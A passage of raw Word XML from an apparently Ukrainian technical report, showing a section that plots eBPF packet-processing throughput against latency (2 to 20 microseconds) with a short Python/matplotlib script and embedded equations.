      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>)')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt.grid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0859" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0859" w:rsidRPr="005503AA" w:rsidRDefault="00CC6CB6" w:rsidP="005B2A6E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Графік пропу</w:t>
      </w:r>
      <w:r w:rsidR="005503AA" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>скної здатності</w:t>
      </w:r>
      <w:r w:rsidR="005503AA" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Throughput)</w:t>
      </w:r>
      <w:r w:rsidR="005503AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="005503AA" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>затримка</w:t>
      </w:r>
      <w:r w:rsidR="005503AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005503AA" w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="560" w:dyaOrig="440">
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:27.45pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1793511356" r:id="rId33"/>
        </w:object>
      </w:r>
      <w:r w:rsidR="005503AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0859" w:rsidRPr="00BC6B10" w:rsidRDefault="005503AA" w:rsidP="005B2A6E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Цей графік ілюструє, як змінюється пропускна здатність системи, коли затримка обробки пакета зростає.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005503AA" w:rsidRDefault="005503AA" w:rsidP="005503A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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0859" w:rsidRPr="005503AA" w:rsidRDefault="005503AA" w:rsidP="005503AA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="center" w:pos="4678"/>
          <w:tab w:val="right" w:pos="935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ab/>
      </w:r>
      <w:r w:rsidRPr="005503AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:object w:dxaOrig="2280" w:dyaOrig="840">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:114pt;height:42pt" o:ole="">
            <v:imagedata r:id="rId34" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1793511357" r:id="rId35"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0859" w:rsidRDefault="00BD5158" w:rsidP="005503A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5503AA" w:rsidRPr="005503AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005503AA" w:rsidRPr="005503AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> відповідно до розрахунків </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>стало відомо, що:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRDefault="00BD5158" w:rsidP="005503AA">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="560" w:dyaOrig="440">
          <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:27.45pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1032" DrawAspect="Content" ObjectID="_1793511358" r:id="rId36"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>змінюється від 2 мікросекунд до 20 мікросекунд.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="00BD5158" w:rsidRDefault="00BD5158" w:rsidP="005503A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цьому, п</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ропускна здатність зростає, коли затримка зменшується.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> код:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t># Данні</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>microseconds</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>np</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(2, 20, 100)  # затримка в мікросекундах</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t># Обчислення пропускної здатності</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 1 / (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>microseconds</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-6)  # пропускна здатність (пакетів/с)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="00BD5158" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Побудова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>графіку</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="00BD5158" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt.plot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t_eBPF_microseconds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
